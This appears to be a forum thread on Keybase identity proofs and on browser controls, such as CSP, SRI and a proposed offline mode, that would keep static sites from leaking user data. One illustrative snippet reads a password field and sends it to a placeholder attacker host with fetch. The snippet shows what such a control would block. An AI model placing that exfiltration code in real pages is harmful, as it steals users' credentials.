
Kind of him to offer. I found it interesting to think about the issue of trust here. He's claimed to be a certain individual, linking to social media with a long history as proof of identity, but he still had to admit that you're basically hitting up a site to solve identity theft using a tool that might cause you even more privacy problems should the individual not be who he claims to be[0].

I hope the folks at Keybase notice this. It's a perfect use case. He's specifically pointed to his long social media history as proof that should increase trust. Keybase would let him use its proofs feature to validate that he (well, his account) controls his Twitter account, that domain and website[1], and his HN account. I can't think of a better way to reduce the "you can't really trust that I am who I say I am" problem he's struggling with.
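
If I remember the Keybase CLI right, publishing those proofs boils down to something like this (service names from memory, example.com is a placeholder, so treat it as a sketch):

    keybase prove twitter            # posts a signed statement as a tweet
    keybase prove hackernews         # signed statement goes in the HN profile's "about" field
    keybase prove dns example.com    # proves the domain via a DNS TXT record
    keybase prove web example.com    # or via a keybase.txt file hosted on the site

Anyone could then check the whole set at once with keybase id <username> or on his Keybase profile page.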

Of course, this could be gamed just like every other method of authenticating identity, but it's a nice additional option.

[0] I'm not saying he's not or assuming he's malicious; I tend to err on the side of assuming the best in people.

[1] You can submit proofs for both.




What we lack, in my opinion, is a form of access control for static websites, such that they are disallowed from making any outgoing requests. The browser is in control of the site code; it should be possible to guarantee that no outgoing requests can take place. As far as I can see, it shouldn’t be difficult, but it’s possible I’m missing something — I assume the difficult part is just reaching agreement.

Perhaps it would be possible to permit outgoing requests where the URL is statically embedded in the HTML (such that the URL cannot depend on form data), thus allowing fetching e.g. remote CSS/JS resources.
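
To make the distinction concrete (cdn.example.com and evil.example are just placeholders), the first kind of reference would stay allowed while the second would be blocked:

    <!-- allowed: the URL is spelled out literally in the served HTML -->
    <link rel="stylesheet" href="https://cdn.example.com/site.css">
    <script src="https://cdn.example.com/app.js"></script>

    <!-- blocked: the URL is built at runtime and could encode the user's data -->
    <script>
      const secret = document.querySelector("#password").value;
      fetch("https://evil.example/collect?d=" + encodeURIComponent(secret));
    </script>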


Who would be the party that ensures the site is actually static and doesn't send data off to a backend?


The browser handles requests to the backend, and would thus be the one in charge of not allowing requests in case the site enables this proposed “offline mode”. So all the browser would allow would be the initial, user-initiated fetch of the static site, whereas subsequent requests — initiated by the site itself — would be disallowed.


Isn't that basically CORS?


CORS stops you from contacting an external service that doesn't opt in. It doesn't solve the problem of having private data in the browser that you don't want it to send out, since it could contact an evil site that opts in to receiving messages from other web pages.

Implementing something like the suggestion would require two phases: one where the page loads/updates its cache from the remote service but cannot look at locally stored data, and another where the user is able to log in and allow access to locally stored data. Once the transition to the second phase has been made, network access would no longer be allowed. This sounds pretty involved.
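
A rough sketch of what those two phases might look like if you tried to approximate them with a Service Worker today (an illustration of the shape only, since a hostile page would simply not register such a worker; the browser itself would have to enforce it):

    // sw.js -- sketch only; the cache name and message protocol are made up
    const PRECACHE = "phase-one-cache";
    let phaseTwo = false; // would need persisting (e.g. IndexedDB); workers get killed and restarted

    self.addEventListener("install", (event) => {
      // phase one: fetch/update the app shell; no local user data is readable yet
      event.waitUntil(
        caches.open(PRECACHE).then((cache) => cache.addAll(["/", "/app.js", "/style.css"]))
      );
    });

    self.addEventListener("message", (event) => {
      // the page signals that the user has logged in and unlocked local data
      if (event.data === "enter-phase-two") phaseTwo = true;
    });

    self.addEventListener("fetch", (event) => {
      if (!phaseTwo) return; // phase one: fall through to the network as usual
      // phase two: answer only from the cache, never from the network
      event.respondWith(
        caches.match(event.request).then((hit) => hit || new Response(null, { status: 504 }))
      );
    });

Even then there are channels left over (top-level navigations, form posts), which is part of why it sounds involved.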


Turn off JavaScript


Something like uMatrix can be used by the client, and Content Security Policy combined with Subresource Integrity can be used by the publisher.
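
Roughly what that looks like from the publisher's side (cdn.example.com and the integrity hash are placeholders):

    <!-- CSP: no dynamic connections or form posts; assets only from one CDN -->
    <meta http-equiv="Content-Security-Policy"
          content="default-src 'none'; connect-src 'none'; form-action 'none';
                   script-src https://cdn.example.com; style-src https://cdn.example.com;
                   img-src 'self'">

    <!-- SRI: the browser refuses the script if its hash doesn't match the integrity attribute -->
    <script src="https://cdn.example.com/app.js"
            integrity="sha384-REPLACE_WITH_THE_REAL_HASH"
            crossorigin="anonymous"></script>

Delivering the policy as an HTTP header rather than a meta tag is generally preferred, since the header applies to the whole document from the start.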



